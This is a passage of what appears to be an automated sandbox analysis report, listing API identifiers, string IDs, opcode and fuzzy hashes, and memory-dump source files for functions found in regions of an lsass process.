                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction ID: c8981e0f0a630bc073eb3ea058f46c82ddab3b636a20e53b92a1993270bb8627
                                                                  • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction Fuzzy Hash: D951BE32211B80CAFB15CB25E48CB5D3799F340B88F528127EFA64778AEB35D859C718
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 357e8c5ba4c628fba0ea65205fc2ee46afd9b4b5c85d8310afd22e6c4a784821
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: 0E518C32612700CAFB68CB29E48CB2D3B95F344BD8F528127DB564778AEB35D989C705
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 5f0c297950effa524e4e769826351e9490e2c10184b4866aaa5f5598b7c48bd8
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: B6313832211B40D6FB189F29E88C72D3BA4F740BD8F568117AF9647786DB39C989CB04
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: c0dfb120e46251c085cc94f704bf45e2a309e4c6bc03487b974fea887a0dcd36
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 6FF08262304B80D1FA109B13B98C11D6265BB48FC0F095133EF6A0BB2ACF2CC4598700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: dacdeb2503ec733809480f479b6f78915991b8d7b867b1ce9d4656bbfd3250fd
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: E6F06D66311B01D1FE148B28E8CC36D6324AB887A5F96031BDBAA462F6DF3EC14DC300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: 63aee3b9ec5174f52814ecfeb468680f3888a9a911f3f45aacd3126e13378fbb
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: B2029432219BC4C6EAA0CB55F49875EB7A0F384794F114517EBDE87BAADB78C458CB00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: 8c1f0d9c981ea39f0d9591dff87f0d10d2555c98087178cb1a019aaa009f7cd6
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: 9061A462619B84C6F664CB25F49C71E77A0F388B88F110117EBDE47BA6DB78C5588B40
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 9afaf77a51172dfa547c055fa4850f67a3c3b84cf19cedfec98b2ce3f0a1e798
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: C311C633A5CF00C5FA641568E4EE36D10407B54374F070A37AB76162EBCBBA884C8104
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: f70bf82c5cceb02d6e10d5093806def2d0eaeb57d5b80097f07828bafbb9e1e9
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 6F118233A14B11CBFA583268E4DE36D11816B58378F4B4637AB76067E7CB3A8C4D8208
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 414ef94bc0d89e96803b88d928f4e21485ea40797e4d0dc57dbd216fb8bb788f
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: 0D615876600B84CAF720DF65D48839E77A0F355B88F054217EFA917B9ADB38E5A9C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 9b7bf021ba2a726e85ca9365be4a1c125000aa5d10ce3b8ffd8aef1fa681eda9
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 30515A72204780CAFB748F26959C35C77A0E364B94F1A5217DB9987BD6CB38D4A9CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 4355c71fb95ee1ef40e57e6e02147f1081f46168938f00ea2bed68f88a9d16f9
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 2B517C321107C1C6FB648B15A4CD35E77A0E755B84F164217DBE98BBD6CB38D869CB01
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: adfa0ac79cbee283e7e25f2939b0e43b70932ab6d07c4aaa56a3cfd0b151c1fc
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: CE115422318781E1FB609735E89D39E52A4F784780F9341239F9983796EF29C95DC740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: 86f804ca370ea88980c1900413645ff46994125e3e133b6105d09c27127dc8fa
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: C6D1AB33B04B80CAF711CFA9D4882AC77A1E354BD8F558217CF5A97B9ADA39C45AC740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: c24711f5e4ccf87d5e80ffb69706461687795d085dbc81286a19724898a2a8d5
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: D3015A72600B90C6E744DFA6E88C24EB7A4F788F80F064527EB9A4372ADF39C459C744
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF2D9B), ref: 00000202C0AF2ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF2D9B), ref: 00000202C0AF2F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: 4ccc7f308ffffb04e28b660d9b7e4fbf79716dbb69ece1079529d9764aeabe7a
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: 4391AD63614750C9FB60DF6594CC3AD2BA0F744B88F26411BDF4A67A9ADB36C89AC700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: 77d80f9dbee3f851834fd7c7e2a90673b38f834d57733b8b2f108d4767e42c81
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: 0911EC26710B44C9FB00CB60E8993AD33A4F759B58F451E26DA6D467A5EB78C5988380
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: 7d7f04bd19e7a731a6c7dafde95eda89c3a329cef3e26e8ce2b5ef349618afa7
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: B4616636604B84CAFB24DF65D48839D7BA0F358B88F054217EF4917B9ADB79D499C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: 29b586d80d86d2dd6352c2401e50b34bd115b1afb984fbf05cbc000a4141d265
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 6451C5222047C1C1F6649A29A5EC3AE67A1F385780F560117DFE943B9BDE3DC96CCB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: ee30d38affed31b38a1ae71746e81f1a3c84c15076c7b03193478497cef2870e
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: 0A614022A39F88CCF5639B3994AD269571CBF523C5F43D307EA0B75A63DB1B904B9600
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: a5b9aff85e46cdca0c990605defdec232b6a9f9f2dfe78cb6c2825141ba38f4e
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: 65418073214B80C6EB208F65E48C3AE67A0F798794F524023EF8D87795DB79C44AC740
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: c6835301eea6b141ab951bbdbd22de10031eba98f4cdd88e8fafccebf38e23db
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: FB112B32214B8482EB218F15E48835D77E5F788B94F594226EFDC0776ADF3DC5658B04
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
